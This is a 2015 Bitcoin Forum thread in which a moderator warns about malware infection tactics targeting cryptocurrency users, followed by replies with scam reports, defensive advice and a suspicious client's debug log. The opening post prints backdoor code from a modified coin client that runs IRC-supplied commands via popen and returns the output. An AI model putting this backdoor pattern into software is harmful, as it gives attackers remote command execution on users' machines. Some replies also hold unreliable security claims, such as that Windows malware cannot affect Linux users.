Bitcoin Forum
December 17, 2017, 10:38:27 PM *
News: Latest stable version of Bitcoin Core: 0.15.1  [Torrent].
 
   Home   Help Search Donate Login Register  
Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [All]
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 138998 times)
grue
Global Moderator
Legendary
*
Offline Offline

Activity: 2058



View Profile
January 25, 2015, 10:33:22 PM
 #1

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

It is pitch black. You are likely to be eaten by a grue.

Tired of annoying signature ads? Ad block for signatures
1513550307
Hero Member
*
Offline Offline

Posts: 1513550307

View Profile Personal Message (Offline)

Ignore
1513550307
Reply with quote  #2

1513550307
Report to moderator
1513550307
Hero Member
*
Offline Offline

Posts: 1513550307

View Profile Personal Message (Offline)

Ignore
1513550307
Reply with quote  #2

1513550307
Report to moderator
1513550307
Hero Member
*
Offline Offline

Posts: 1513550307

View Profile Personal Message (Offline)

Ignore
1513550307
Reply with quote  #2

1513550307
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1513550307
Hero Member
*
Offline Offline

Posts: 1513550307

View Profile Personal Message (Offline)

Ignore
1513550307
Reply with quote  #2

1513550307
Report to moderator
Rolandvoda
Member
**
Offline Offline

Activity: 109


View Profile
January 29, 2015, 05:10:56 AM
 #2

Could you please post the coin's name and maybe others that you may have found ?
muhrohmat
Sr. Member
****
Offline Offline

Activity: 252


View Profile
January 31, 2015, 07:33:18 AM
 #3

correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.

garmin
Hero Member
*****
Offline Offline

Activity: 506


View Profile
February 03, 2015, 12:08:47 AM
 #4

I was checking some IRC bootstrap connections and found some additional info.

Kinda looks ripe for the picking by a exploit.

https://bitcointalk.org/index.php?topic=943519.new#new

 Undecided
crazyideas21
Jr. Member
*
Offline Offline

Activity: 33

Researcher at Univ of California San Diego


View Profile WWW
February 11, 2015, 12:45:31 AM
 #5

I'm adding this to the list of possible scams:

https://bitcointalk.org/index.php?topic=951827.0
TrinityCoin
Sr. Member
****
Offline Offline

Activity: 264


View Profile
February 11, 2015, 04:31:57 AM
 #6

Could you please post the coin's name and maybe others that you may have found ?

This is found in the "Lucky7coin" source code, as linked above.

shavers
Sr. Member
****
Offline Offline

Activity: 343



View Profile
February 14, 2015, 10:04:48 PM
 #7

I'd like to add the bitcoinwisdomapp.com to the blacklist. It's a keylogger behind it.

Aber wie willst du denn einmal sterben, Narziß, wenn du doch keine Mutter hast?
Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
February 17, 2015, 05:40:48 AM
 #8

Any thoughts ?

EDIT
SPR, ORB and at least one or two other coins are using this faucet/ block explorer site.

BE VARY WARY OF THE MULTIFAUCET BLOCK EXPLORER !

I searched an for an address and was left with having to fight virus scan pop ups for a few minutes.







crazyideas21
Jr. Member
*
Offline Offline

Activity: 33

Researcher at Univ of California San Diego


View Profile WWW
February 17, 2015, 05:54:00 AM
 #9

The multifaucet.tk wallet search would redirect you to a third-party ad network. Subsequently, the ad network would redirect you to the destination page -- which, in this case, is the result of the wallet search. I'm in California; the ad network being shown is adf.ly. Depending on your geographic location, you may get a different ad network. These third-party sites generate revenue for multifaucet upon every ad view. This is paid for by the ad publisher. However, multifaucet has no control of what ads are being shown. To maximize their profits, ad publishers may show ads that may lead to malware, which promises higher margins than conventional ads.

In my case, I encountered the following page:

Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
February 17, 2015, 06:04:20 AM
 #10

In my case, IE11 was completely locked up and I had to be fast with the "end process" clicks.

I've never had my browser hijacked like this. That is unless we count AMD's user surveys they keep imposing on us after a driver install. lol

Gabe
Jr. Member
*
Offline Offline

Activity: 38


View Profile
February 18, 2015, 07:30:11 PM
 #11

That's terrible. Anyone of you encountered the ransom cryptolocker? I heard about it not long ago. What is wrong with people?
fartbags
Legendary
*
Offline Offline

Activity: 1176


View Profile
March 03, 2015, 01:18:57 AM
 #12

Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?

crazyideas21
Jr. Member
*
Offline Offline

Activity: 33

Researcher at Univ of California San Diego


View Profile WWW
March 03, 2015, 01:23:24 AM
 #13

Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?

Yes, that would be one solution.
Decksperiment
Sr. Member
****
Offline Offline

Activity: 378


Uniting the Power of Sound & Ceation


View Profile
March 03, 2015, 04:14:52 AM
 #14

Wow.. this is like so pointless (not the thread, the 'hack') nowadays.. why not just place a keylogger in bios, then no matter what os folks use, you have 100% access to whatever machines are connected?

Edit: Hint: Speedracer.

BTC: 1654DECHaU4QyYXom9ooRBvt2zmULR3MfZ
dooglus
Legendary
*
Offline Offline

Activity: 2366



View Profile
March 08, 2015, 07:37:28 PM
 #15

Edit: Hint: Speedracer.

http://events.ccc.de/congress/2014/Fahrplan/system/attachments/2565/original/speed_racer_whitepaper.pdf

Just-Dice                 ██             
          ██████████         
      ██████████████████     
  ██████████████████████████ 
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
    ██████████████████████   
        ██████████████       
            ██████           
   Play or Invest                 ██             
          ██████████         
      ██████████████████     
  ██████████████████████████ 
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
██████████████████████████████
    ██████████████████████   
        ██████████████       
            ██████           
   1% House Edge
bitsat alien
Full Member
***
Offline Offline

Activity: 122


View Profile
March 13, 2015, 06:32:45 AM
 #16

Thanks for being on top of this and keeping us informed, we do appreciate it!
Decksperiment
Sr. Member
****
Offline Offline

Activity: 378


Uniting the Power of Sound & Ceation


View Profile
March 13, 2015, 04:03:26 PM
 #17


Lol, this was just the beginning, If I can put a keylogger in my 64mb lappy bios.. I can do it with anyone..

Keep in mind this hack was released solely by them to LOCKDOWN your bios so you cant tamper with overclocking your machine.. the security they released after this demonstration is exactly how they get into your bios as only the NSA would LOVE.

Edit: There is need for a new style of bios security, like anti virus, which, when your bios gets bigger, can load in bios FIRST, before bios is loaded.. it's not as hard as you think, but I'm not THAT good..

BTC: 1654DECHaU4QyYXom9ooRBvt2zmULR3MfZ
AshCoiner
Newbie
*
Offline Offline

Activity: 10


View Profile
March 31, 2015, 03:52:25 AM
 #18

I just received something like this an hour ago.  I was surfing Ebay and laughed when I saw PimpCash.  Having to see if it was real, I went to pimpcash.com. Immediately something like what you showed came up.  However, for me, it pretended to be my service provider and gave me a number to call.  I confess I did try to call but the ring didn't sound right.  Sounded like an old telephone.  I hung up and rebooted my computer.  Things seem to be ok now.  I ran a quick scan and all seems to be okay.  Is there anything else I should do to check to see if my computer is okay?

Any thoughts ?

EDIT
SPR, ORB and at least one or two other coins are using this faucet/ block explorer site.

BE VARY WARY OF THE MULTIFAUCET BLOCK EXPLORER !

I searched an for an address and was left with having to fight virus scan pop ups for a few minutes.
Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
April 01, 2015, 11:39:02 PM
 #19

Please check your "program files(x86) and the youruser/appdata/local/TEMP folders ! The ASN client is a remote desktop hack !

https://bitcointalk.org/index.php?topic=984878.msg10951987#msg10951987




ed_teech
Hero Member
*****
Offline Offline

Activity: 507


Jahaha


View Profile
April 10, 2015, 09:22:12 PM
 #20

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
April 10, 2015, 11:28:02 PM
 #21

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.

Or any noob with access to it.

How to detect RAT (remote admin tool) --> https://youtu.be/btn9nWE3X7o

Hazard
Legendary
*
Offline Offline

Activity: 994


Internet Celebrity


View Profile WWW
April 15, 2015, 03:02:04 PM
 #22

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
I'm surprised we haven't seen a more concerted effort, honestly.

Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
April 15, 2015, 11:32:44 PM
 #23

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
I'm surprised we haven't seen a more concerted effort, honestly.

What makes you say that ?

Is there a way to detect files that have malware binded to them ?

mullick
Legendary
*
Offline Offline

Activity: 952


View Profile
April 23, 2015, 05:30:31 AM
 #24

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.

Or any noob with access to it.

How to detect RAT (remote admin tool) --> https://youtu.be/btn9nWE3X7o


I get about 1-3 emails a month with a RAT as an attachment. The most recent of which seems to be smart enough to detect they are in a vm. Mostly java based meaning they effect Unix/Linux machines as well as Windows

Keep java off any machine you store crypto on. That should be a no brainer

Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
April 23, 2015, 01:27:15 PM
 #25

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.

Or any noob with access to it.

How to detect RAT (remote admin tool) --> https://youtu.be/btn9nWE3X7o


I get about 1-3 emails a month with a RAT as an attachment. The most recent of which seems to be smart enough to detect they are in a vm. Mostly java based meaning they effect Unix/Linux machines as well as Windows

Keep java off any machine you store crypto on. That should be a no brainer



Yes.. say NO to Java and.. very sneaky redirects. Wink

Hover over the windows download link and you'll see the GitHub addy. Click it and you'll be redirected to this :

8.06MB


2.90MB EDIT -> You must copy n paste the shortcut onto a new tab if you want to visit the GitHub page.


Huh Huh


deadp00l
Member
**
Offline Offline

Activity: 72


View Profile
April 25, 2015, 03:02:55 PM
 #26

How to keep your home computer malware free.
 
How could it happen?
Clicking a link or attachment in email.
Visiting a website that has malware installed. Depending on your browser settings and what plug-ins you have installed (Flash, Java, Acrobat Reader) malicious software could be installed on your computer without out you knowledge.
 
What could happen?
You could loose all the data on your computer.
All the data on your computer could be held for ransom.
Your computer could be used to commit crimes.
Your personal information could be stolen.
Someone could access all of your accounts.
Someone could log everything you type.
Someone could access all the files on your computer.
 
Prevention
Update your operating system and third party applications.
http://secunia.com/vulnerability_scanning/personal/
 
Disable auto run for Plug-Ins
In Google Chrome navigate to chrome://settings/content.
Under Plug-ins select Click to play.
You can add exceptions by going to chrome://settings/content, Plug-ins, and clicking "Manage exceptions..."
 
Use a DNS server that blocks known malicious sites
Symantec https://dns.norton.com/
Comodo https://www.comodo.com/secure-dns/
 
Use Windows Defender on Windows 8 or Microsoft Security Essentials on Windows 7
They are free and affective.
 
Buy and install MalwareBytes Premium and Malware Bytes Anti-Exploit Premium ($25 Each)
 
Be suspicious about links and attachments in emails. Don't click them.
 
Backup your data
Use BitTorrent Sync to sync your data with another computer.
Use and application like Acronis TruImage to make a scheduled backup to an external drive. Get two external drives and rotate them regularly. Keep one copy at a different location.
Use a cloud based backup service like Carbonite, Crashplan or Backblaze.
 
Consider replacing your current router with with a UTM (Unified Threat Management) firewall that has security software built in. Note that most of these are relatively expensive and require ongoing subscriptions.
Example http://www.asus.com/support/FAQ/1008719/

Be careful with remote access to your PC
Don't use VNC to remotely access your PC. Passwords are easily brute forced via automated scanning scripts. For best security consider two-factor authentication.
chases
Full Member
***
Offline Offline

Activity: 186


ain't nothing like the Blues


View Profile
May 11, 2015, 10:51:41 PM
 #27

Thanks everyone Grin alot of great informative and useful information here! excellent job

100110100011010011
melody82
Sr. Member
****
Offline Offline

Activity: 350


View Profile
May 29, 2015, 06:31:51 PM
 #28

So just to be clear, I can hacked without downloading anything but just by visiting a naughty site?  And I should uninstall acrobat, java and flash altogether?  Wow thanks for this information.

Another question, I have Norton 360, but is malwarebytes that much better? 

And thanks for this thread.  Many of us don't know all that much about these threats so thanks for educating us.
BIT-Sharon
Sr. Member
****
Offline Offline

Activity: 266


View Profile
June 01, 2015, 03:06:43 AM
 #29

may be one is just forwarding the posts of malware without distinguish, we have to differ according to this article.
joter85
Sr. Member
****
Offline Offline

Activity: 343


Crypto-Games.net: #1 Gambling Site


View Profile WWW
June 02, 2015, 12:03:29 PM
 #30

Best thing would be to setup a PC to use only for Bitcoin transactions?   Grin


 

▇▇▇▇
▇▇▇▇▇▇▇
▇▇▇▇▇▇▇▇▇▇
▇▇▇▇▇▇▇▇▇▇▇▇
▇▇▇▇▇▇▇▇▇▇▇▇▇
▇▇▇▇▇▇▇▇▇▇▇▇▇
▇▇▇▇▇▇▇▇▇▇▇▇▇
▇▇▇▇▇▇▇▇▇▇▇▇▇
▇▇▇▇▇▇▇▇▇▇▇▇
▇▇▇▇▇▇▇▇▇▇
▇▇▇▇▇▇▇▇
▇▇▇▇▇▇
 
superresistant
Legendary
*
Offline Offline

Activity: 1680



View Profile
June 03, 2015, 07:32:00 PM
 #31

So just to be clear, I can hacked without downloading anything but just by visiting a naughty site?  And I should uninstall acrobat, java and flash altogether?  Wow thanks for this information.

Yes you can get hacked visiting a website because your browser (Internet Explorer/Chrome/Firefox...) execute the scripts by default.
The solution against it is to use NoScript plugin in Firefox : it will block every scripts and make browsing much safer. You'll need to check and authorize scripts one by one. If anything is suspicious, you can get away without damage.

Another question, I have Norton 360, but is malwarebytes that much better? 
And thanks for this thread.  Many of us don't know all that much about these threats so thanks for educating us.

Antiviruses cannot detect new virus or specific crypto malwares.
It only protect from known viruses.

The solution to be safe is to use Linux (Ubuntu for example) for anything related to crypto.
Viruses developed for Windows cannot target Linux.
Linux users can still get targeted through the Internet browser, that's why you should use NoScript too.

Here's my bag so you don't ask : Bitcoin, tenX, iexec, byteball and pepecash
johnbrainless
Sr. Member
****
Offline Offline

Activity: 280



View Profile
June 09, 2015, 04:09:43 PM
 #32

be careful people

♝ Pandacoin   ♝ Buy With Paypal Or Credit Card ♝ FaceBook tipping ♝ Irc channel #DigitalPandacoin with tipbot
✬ Earn 2.5% Annual Interest ✬ Active Dev Team ✬ Blazing Fast Multi Mode Wallet ✬ Paper Wallet ✬ No premine or IPO ✬
☠☠☠☠☠☠☠ PANDACOINPND (´(ェ)`) Digital Pandacoin (´(ェ)`) PANDACOINPND ☠☠☠☠☠☠☠
melody82
Sr. Member
****
Offline Offline

Activity: 350


View Profile
June 11, 2015, 05:57:03 AM
 #33

So just to be clear, I can hacked without downloading anything but just by visiting a naughty site?  And I should uninstall acrobat, java and flash altogether?  Wow thanks for this information.

Yes you can get hacked visiting a website because your browser (Internet Explorer/Chrome/Firefox...) execute the scripts by default.
The solution against it is to use NoScript plugin in Firefox : it will block every scripts and make browsing much safer. You'll need to check and authorize scripts one by one. If anything is suspicious, you can get away without damage.

Another question, I have Norton 360, but is malwarebytes that much better? 
And thanks for this thread.  Many of us don't know all that much about these threats so thanks for educating us.

Antiviruses cannot detect new virus or specific crypto malwares.
It only protect from known viruses.

The solution to be safe is to use Linux (Ubuntu for example) for anything related to crypto.
Viruses developed for Windows cannot target Linux.
Linux users can still get targeted through the Internet browser, that's why you should use NoScript too.

Thanks for the explanation!  I am thinking of getting a computer dedicated to just crypto transactions after reading this.  It seems like no matter how careful you are there is always a danger.
Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
June 12, 2015, 10:57:38 PM
 #34

WARNING !! This client is making outbound connections to known malware and/or phishing sites.


http://www.urlquery.net/report.php?id=1434020970582

The "Recent reports on same IP/ASN/Domain" section shows other suspicious sites/links.
https://www.virustotal.com/en/url/946ac3207509fb493eaf2e02e107b97cc03513cb373bb007a8a61b9b6b0fe61c/analysis/1434120962/

Now lets see what the debug.log has to say...
Code:
2015-06-12 12:41:10 connection timeout
2015-06-12 12:41:11 trying connection 77.249.89.46:9748 lastseen=1802.3hrs
2015-06-12 12:41:16 connection timeout
2015-06-12 12:41:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:41:22 connection timeout
2015-06-12 12:41:22 trying connection 82.238.124.41:9748 lastseen=33.6hrs
2015-06-12 12:41:27 connection timeout
2015-06-12 12:41:28 trying connection 77.85.35.151:9748 lastseen=170.7hrs
2015-06-12 12:41:33 connection timeout
2015-06-12 12:41:33 trying connection 137.135.57.119:9748 lastseen=27.6hrs
2015-06-12 12:41:38 connection timeout
2015-06-12 12:41:39 trying connection 96.54.4.190:9748 lastseen=21.7hrs
2015-06-12 12:41:44 connection timeout
2015-06-12 12:41:44 trying connection 87.154.210.76:9748 lastseen=378.8hrs
2015-06-12 12:41:49 connection timeout
2015-06-12 12:41:50 trying connection 103.230.107.12:9748 lastseen=2166.3hrs
2015-06-12 12:41:55 connection timeout
2015-06-12 12:41:55 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:00 connection timeout
2015-06-12 12:42:01 trying connection 62.157.39.12:9748 lastseen=2675.3hrs
2015-06-12 12:42:06 connection timeout
2015-06-12 12:42:06 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:11 connection timeout
2015-06-12 12:42:12 trying connection 162.255.117.105:9748 lastseen=52.5hrs
2015-06-12 12:42:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:22 connection timeout
2015-06-12 12:42:23 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:28 connection timeout
2015-06-12 12:42:28 trying connection 5.139.143.81:9748 lastseen=3461.6hrs
2015-06-12 12:42:33 connection timeout
2015-06-12 12:42:34 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:39 connection timeout
2015-06-12 12:42:39 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:44 connection timeout
2015-06-12 12:42:45 trying connection 87.154.214.25:9748 lastseen=2063.7hrs
2015-06-12 12:42:50 connection timeout
************************************************************
2015-06-12 12:42:50 trying connection 104.219.250.234:9748 lastseen=7.2hrs**
************************************************************
2015-06-12 12:42:55 connection timeout
2015-06-12 12:42:56 trying connection 80.57.229.215:9748 lastseen=115.2hrs
2015-06-12 12:43:01 connection timeout
2015-06-12 12:43:01 trying connection 77.232.5.253:9748 lastseen=1191.0hrs

Report for the address, 104.xxx.xxx.234, :
http://www.urlquery.net/report.php?id=1434121818636

And one of it's suspicious links/sites :
https://www.virustotal.com/en/url/3b1a7af045bdc8005e8243f65d203df04ba8d43f9e10fd39af1004aad75da0ed/analysis/1434122387/

maheshmahi
Jr. Member
*
Offline Offline

Activity: 56


View Profile
June 19, 2015, 02:54:55 PM
 #35

All of them use only keylogger
Can we ensure safety to our wallet.

MaryJ
Sr. Member
****
Offline Offline

Activity: 305


Managing Director of Maryjanecoin LLC


View Profile
July 03, 2015, 10:45:26 AM
 #36

not good to see

Maryjanecoin.org
wolfwere
Newbie
*
Offline Offline

Activity: 9


View Profile WWW
August 05, 2015, 04:51:38 PM
 #37

man, this is terribly scary!
TransaDox
Full Member
***
Offline Offline

Activity: 219


View Profile
August 06, 2015, 08:54:31 PM
 #38

Edit: There is need for a new style of bios security, like anti virus, which, when your bios gets bigger, can load in bios FIRST, before bios is loaded.. it's not as hard as you think, but I'm not THAT good..
Or they could just put a small mechanical switch in like the dip switches they used to put on the motherboard years ago. Problem solved.
jackg
Legendary
*
Offline Offline

Activity: 854

1JRmjyGo3kpdXcQeAeTBmGtgkC1AomHKED


View Profile
August 27, 2015, 10:40:24 AM
 #39

correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.

Malware can still be coded on linux and can be hdden inside programs. Linux needs more permissions but if you allow the rogram to run, then you allow the malware to run and harm you computer whether it is linux or mac!

jackg
Legendary
*
Offline Offline

Activity: 854

1JRmjyGo3kpdXcQeAeTBmGtgkC1AomHKED


View Profile
August 27, 2015, 10:42:38 AM
 #40

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

groggin
Legendary
*
Offline Offline

Activity: 1442



View Profile
August 27, 2015, 08:14:06 PM
 #41

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity  |  Sign-up @ Aurovine to get FREE HD music ... and coins!|  *TIPs*  | VNL  Vkpn45TSLR1jBa34pyrTwWDzADTEyviz4E   | TALK   CXvZkT13CNjn3ScizW1oEHWNVEAduJuKCJ   |   BTC   18wWrEfcA62D5Xmza1rRAw5cgcqwCa2YFH   |    ELP  e7rPHqbczFnUdyBk2XEdm9tj4fqjGnCqK4     Buy - Sell on          Cryptopia  |  Bleutrade   |    Poswallet     |  an experiment in trust and control - FLYcoin   |   FATiB27UfQyySJCyM1dEQTaxMdZgqxHZ4y
jackg
Legendary
*
Offline Offline

Activity: 854

1JRmjyGo3kpdXcQeAeTBmGtgkC1AomHKED


View Profile
August 27, 2015, 08:26:49 PM
 #42

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programms

BitcoinNewsMagazine
Legendary
*
Offline Offline

Activity: 994



View Profile WWW
August 27, 2015, 08:38:14 PM
 #43

How to keep your home computer malware free.
 
How could it happen?
Clicking a link or attachment in email.
Visiting a website that has malware installed. Depending on your browser settings and what plug-ins you have installed (Flash, Java, Acrobat Reader) malicious software could be installed on your computer without out you knowledge.
 
What could happen?
You could loose all the data on your computer.
All the data on your computer could be held for ransom.
Your computer could be used to commit crimes.
Your personal information could be stolen.
Someone could access all of your accounts.
Someone could log everything you type.
Someone could access all the files on your computer.
 
Prevention
Update your operating system and third party applications.
http://secunia.com/vulnerability_scanning/personal/
 
Disable auto run for Plug-Ins
In Google Chrome navigate to chrome://settings/content.
Under Plug-ins select Click to play.
You can add exceptions by going to chrome://settings/content, Plug-ins, and clicking "Manage exceptions..."
 
Use a DNS server that blocks known malicious sites
Symantec https://dns.norton.com/
Comodo https://www.comodo.com/secure-dns/
 
Use Windows Defender on Windows 8 or Microsoft Security Essentials on Windows 7
They are free and affective.
 
Buy and install MalwareBytes Premium and Malware Bytes Anti-Exploit Premium ($25 Each)
 
Be suspicious about links and attachments in emails. Don't click them.
 
Backup your data
Use BitTorrent Sync to sync your data with another computer.
Use and application like Acronis TruImage to make a scheduled backup to an external drive. Get two external drives and rotate them regularly. Keep one copy at a different location.
Use a cloud based backup service like Carbonite, Crashplan or Backblaze.
 
Consider replacing your current router with with a UTM (Unified Threat Management) firewall that has security software built in. Note that most of these are relatively expensive and require ongoing subscriptions.
Example http://www.asus.com/support/FAQ/1008719/

Be careful with remote access to your PC
Don't use VNC to remotely access your PC. Passwords are easily brute forced via automated scanning scripts. For best security consider two-factor authentication.

Good advice to take to heart, thanks for taking the time to post.

groggin
Legendary
*
Offline Offline

Activity: 1442



View Profile
August 27, 2015, 10:42:49 PM
 #44

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programms

(disclaimer: i am no expert here)
  source code is human readable, you don't have to be a programmer to look at it, neither do you have to fully understand all the nuances of an executable to see if it might be malicious.

 check out github
https://github.com/explore

wean yourself from Windows if you haven't already
i like to dual-boot: when i start my pc i can choose win or lin. i always prefer linux but sometimes i'm stuck with 'doz
open source is awesome
it is the life blood of digital liberty imo.  Cheesy

 
 

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity  |  Sign-up @ Aurovine to get FREE HD music ... and coins!|  *TIPs*  | VNL  Vkpn45TSLR1jBa34pyrTwWDzADTEyviz4E   | TALK   CXvZkT13CNjn3ScizW1oEHWNVEAduJuKCJ   |   BTC   18wWrEfcA62D5Xmza1rRAw5cgcqwCa2YFH   |    ELP  e7rPHqbczFnUdyBk2XEdm9tj4fqjGnCqK4     Buy - Sell on          Cryptopia  |  Bleutrade   |    Poswallet     |  an experiment in trust and control - FLYcoin   |   FATiB27UfQyySJCyM1dEQTaxMdZgqxHZ4y
jackg
Legendary
*
Offline Offline

Activity: 854

1JRmjyGo3kpdXcQeAeTBmGtgkC1AomHKED


View Profile
August 28, 2015, 03:14:30 PM
 #45

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programms

(disclaimer: i am no expert here)
  source code is human readable, you don't have to be a programmer to look at it, neither do you have to fully understand all the nuances of an executable to see if it might be malicious.

 check out github
https://github.com/explore

wean yourself from Windows if you haven't already
i like to dual-boot: when i start my pc i can choose win or lin. i always prefer linux but sometimes i'm stuck with 'doz
open source is awesome
it is the life blood of digital liberty imo.  Cheesy

 
 

I do quite like linux, I have a raspberry pi b+ which cannot run a lot of operating systems. Is there a way to change the BiOS so that if I have a certain external hard drive connected then it will run from that. I know it is F2 when started up but I don't want to change the factory settings of my laptop

cryptocoinex
Newbie
*
Offline Offline

Activity: 26


View Profile WWW
December 01, 2015, 08:45:22 AM
 #46

Another pretty save and easy to use program is Deep Freeze.
You can freeze your Windows partition and as soon as you reboot, your pc will go to the state you made when you "freeze" it.
This way no viruses,keyloger,trojans,rats and etc can infect you (as soon as you reboot, the bad staff is gone).
Downside is that you will have to put the block-chain of any coins you use on the second partition of your harddrive (because you will not be able to update the wallet on the windows partition).

Crypto Coinex ORG
Magnesium Coin
Member
**
Offline Offline

Activity: 70


View Profile
December 07, 2015, 11:54:54 AM
 #47

Won't Norton Internet Security detect the malware if present on a certain wallet?

I have been using NIS (legally bought, not patched) for a long time. Hope it can detect them.

Also they are updating binaries every time with "Virus Definition Updates".

Can anyone confirm the facts by testing any malicious wallet on a PC with NIS previously installed?
HeroCat
Hero Member
*****
Offline Offline

Activity: 658


View Profile
December 16, 2015, 03:22:50 PM
 #48

Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink
groggin
Legendary
*
